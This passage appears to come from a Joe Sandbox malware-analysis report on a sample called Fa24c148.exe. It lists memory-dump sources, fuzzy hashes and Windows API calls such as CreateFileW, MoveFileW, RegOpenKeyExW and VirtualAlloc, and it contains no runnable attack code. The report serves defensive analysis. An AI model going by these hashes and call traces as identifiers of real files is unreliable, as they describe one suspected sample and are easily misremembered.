                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 849931509-0
                                                                                                    • Opcode ID: 150793ea9c0f0f78d5fe339fdd0b38b4f286fd840457b64defc1be174833c637
                                                                                                    • Instruction ID: cc00155b087d305277611582236cd6af1522243532d64526095e9acb0e968863
                                                                                                    • Opcode Fuzzy Hash: 150793ea9c0f0f78d5fe339fdd0b38b4f286fd840457b64defc1be174833c637
                                                                                                    • Instruction Fuzzy Hash: 92F06272A04210ABEB15AFF59A4EBAE7278DB04318F20453BF201B71D1D9FC5D028A6D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: de5aa4c1bb5d3f8e11959e1fc0988361606b0ee9916d96b78fe158bf821141de
                                                                                                    • Instruction ID: 292fe9cfc42e020ccba4ca1aabd821194ff51ac34ef1c963243808ae8aa21162
                                                                                                    • Opcode Fuzzy Hash: de5aa4c1bb5d3f8e11959e1fc0988361606b0ee9916d96b78fe158bf821141de
                                                                                                    • Instruction Fuzzy Hash: 9CE04872B101049BCB14CBA4ED808FDB7A5A744314754457FD502B3190C6759C118F28
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1136574915-0
                                                                                                    • Opcode ID: 47b61285cae3f2a8e8a131cf160caa589dae6c71f8bd26570f639ce9431e4caa
                                                                                                    • Instruction ID: 16f547f83e602d96c884a904eba2f663f46e66ccec186bf88b315e1392079143
                                                                                                    • Opcode Fuzzy Hash: 47b61285cae3f2a8e8a131cf160caa589dae6c71f8bd26570f639ce9431e4caa
                                                                                                    • Instruction Fuzzy Hash: BFE08671B04104DBCB50AFF469489DD7378AB50369B100877F401F10D1C6785C008A3D
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Fa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 415043291-0
                                                                                                    • Opcode ID: 4aea1d938fffc26f88db0c1450a16801fb26c1c2da6c6aae83084e0ba0c8a9b4
                                                                                                    • Instruction ID: 6e3fe12f06474a07815b5ea3b085539d8110fe4fc4e7b987d4d26a3482594277
                                                                                                    • Opcode Fuzzy Hash: 4aea1d938fffc26f88db0c1450a16801fb26c1c2da6c6aae83084e0ba0c8a9b4
                                                                                                    • Instruction Fuzzy Hash: 75D09E71658201EFEF098F20DE16F6EBBA2EB84B00F10962DB652940E0D6715815DB16
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,004055C3,?,?,00000000,00405799,?,?,?,?), ref: 004059C3
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                    • Instruction ID: 23f3b5b08cf0a90752775bce35de55709fa588a0c5c1dd0fb40ccfe6c2119a3d
                                                                                                    • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                    • Instruction Fuzzy Hash: E6D01272908120EFC2102728EE0C89BBF95DB543B17118B72FD75A22F0D7304C52CAB6
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 10002927
                                                                                                    • GetLastError.KERNEL32 ref: 10002A2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocErrorLastVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 497505419-0
                                                                                                    • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                    • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                    • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                    • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                    APIs
                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00401679
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMove
                                                                                                    • String ID:
                                                                                                    • API String ID: 3562171763-0
                                                                                                    • Opcode ID: b52732b034676bd900c8dd09e9d96c0449bda3180a08bab671966732f7de0c2e
                                                                                                    • Instruction ID: 083101987cfc82a6cf42c11d2d972b8aec6ba2fd7aec0dc483d5015516fa3923
                                                                                                    • Opcode Fuzzy Hash: b52732b034676bd900c8dd09e9d96c0449bda3180a08bab671966732f7de0c2e
                                                                                                    • Instruction Fuzzy Hash: A7F0B431A08220B3CB10ABB55F4DE8F62A89B6132DF34477BB512B21D1D6BC8901956F
                                                                                                    APIs
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 390214022-0
                                                                                                    • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                    • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                    • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                    • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 699cda25c17bafbadca6f45bdb25344b0c8ec80eddbe54fe411ff33645398d31
                                                                                                    • Instruction ID: b4a940ff9d96c873bdf480266a19e34540b316432bd0f5e01798d68014561859
                                                                                                    • Opcode Fuzzy Hash: 699cda25c17bafbadca6f45bdb25344b0c8ec80eddbe54fe411ff33645398d31
                                                                                                    • Instruction Fuzzy Hash: 89E0BF76254108BAD700EFA5DD46F9677ECEB14745F008425B609D6091C674E5508768
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B1,00000000,00000000,00402FF1,000000FF,00000004,00000000,00000000,00000000), ref: 00405A7A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
